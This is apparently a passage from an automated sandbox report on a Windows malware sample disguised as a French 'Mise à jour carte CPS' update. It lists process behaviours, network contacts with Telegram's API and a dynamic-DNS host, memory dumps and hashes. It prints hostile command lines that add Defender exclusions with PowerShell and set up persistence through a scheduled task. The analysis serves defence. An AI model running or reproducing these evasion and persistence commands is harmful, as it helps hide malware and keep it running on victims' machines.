| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\87189ae08967742a49ed5e98fc5731af9fa843b4bde08151ac5d16a71f0052f6.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\87189ae08967742a49ed5e98fc5731af9fa843b4bde08151ac5d16a71f0052f6.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\87189ae08967742a49ed5e98fc5731af9fa843b4bde08151ac5d16a71f0052f6.exe
"C:\Users\Admin\AppData\Local\Temp\87189ae08967742a49ed5e98fc5731af9fa843b4bde08151ac5d16a71f0052f6.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\87189ae08967742a49ed5e98fc5731af9fa843b4bde08151ac5d16a71f0052f6.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '87189ae08967742a49ed5e98fc5731af9fa843b4bde08151ac5d16a71f0052f6.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Mise à jour carte CPS.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Mise à jour carte CPS.exe'
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Mise à jour carte CPS" /tr "C:\Users\Admin\AppData\Roaming\Mise à jour carte CPS.exe"
C:\Windows\system32\taskeng.exe
taskeng.exe {C86A1B4E-04DB-4EF4-A1E7-330C0FD20D2F} S-1-5-21-3452737119-3959686427-228443150-1000:QGTQZTRE\Admin:Interactive:[1]
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | api.telegram.org | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | dentiste.ddns.net | udp |
Files
memory/2400-0-0x00000000013A0000-0x00000000013D0000-memory.dmp
memory/2400-1-0x000007FEF5390000-0x000007FEF5D7C000-memory.dmp
memory/3036-6-0x000000001B6B0000-0x000000001B992000-memory.dmp
memory/3036-8-0x0000000002810000-0x0000000002818000-memory.dmp
memory/3036-7-0x000007FEF1A80000-0x000007FEF241D000-memory.dmp
memory/3036-9-0x0000000002830000-0x00000000028B0000-memory.dmp
memory/3036-10-0x000007FEF1A80000-0x000007FEF241D000-memory.dmp
memory/3036-11-0x0000000002830000-0x00000000028B0000-memory.dmp
memory/3036-13-0x0000000002830000-0x00000000028B0000-memory.dmp
memory/3036-12-0x0000000002830000-0x00000000028B0000-memory.dmp
memory/3036-14-0x000007FEF1A80000-0x000007FEF241D000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | 9bbb9c3a985a9dfe84a8c247500df6cb |
| SHA1 | 1ac3ae106a5b7f84fae6a93d1c98cecb291f8850 |
| SHA256 | 44c87075f10bf00f403006fe363475e2f02289ee9c0b0f9ca2621faf13aa38f1 |
| SHA512 | da87d2fa1d20baecb41cf7ea215c966c47f361caf309b6960d910570d53d2f3a50188cf31fa19247b780ee614ae94a58aaff70c0c97b68ddb4581ad8a29ab9f2 |
memory/2604-20-0x000000001B500000-0x000000001B7E2000-memory.dmp
memory/2604-22-0x000007FEEDF10000-0x000007FEEE8AD000-memory.dmp
memory/2604-21-0x00000000027A0000-0x00000000027A8000-memory.dmp
memory/2604-23-0x0000000002960000-0x00000000029E0000-memory.dmp
memory/2604-24-0x000007FEEDF10000-0x000007FEEE8AD000-memory.dmp
memory/2604-25-0x0000000002960000-0x00000000029E0000-memory.dmp
memory/2604-27-0x000007FEEDF10000-0x000007FEEE8AD000-memory.dmp
memory/2604-26-0x0000000002960000-0x00000000029E0000-memory.dmp
\??\PIPE\srvsvc
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
memory/2708-34-0x000007FEF1A80000-0x000007FEF241D000-memory.dmp
memory/2708-35-0x0000000002D50000-0x0000000002DD0000-memory.dmp
memory/2708-36-0x000007FEF1A80000-0x000007FEF241D000-memory.dmp
memory/2708-39-0x0000000002D50000-0x0000000002DD0000-memory.dmp
memory/2708-38-0x0000000002D50000-0x0000000002DD0000-memory.dmp
memory/2708-37-0x0000000002D50000-0x0000000002DD0000-memory.dmp
memory/2708-40-0x000007FEF1A80000-0x000007FEF241D000-memory.dmp
memory/2360-47-0x0000000002D10000-0x0000000002D90000-memory.dmp
memory/2360-48-0x000007FEEDF10000-0x000007FEEE8AD000-memory.dmp
memory/2360-49-0x0000000002D10000-0x0000000002D90000-memory.dmp
memory/2360-51-0x0000000002D10000-0x0000000002D90000-memory.dmp
memory/2360-50-0x0000000002D10000-0x0000000002D90000-memory.dmp
memory/2360-46-0x000007FEEDF10000-0x000007FEEE8AD000-memory.dmp
memory/2400-52-0x000007FEF5390000-0x000007FEF5D7C000-memory.dmp
memory/2360-53-0x000007FEEDF10000-0x000007FEEE8AD000-memory.dmp
memory/2400-58-0x000000001ACC0000-0x000000001AD40000-memory.dmp
memory/2400-59-0x000000001ACC0000-0x000000001AD40000-memory.dmp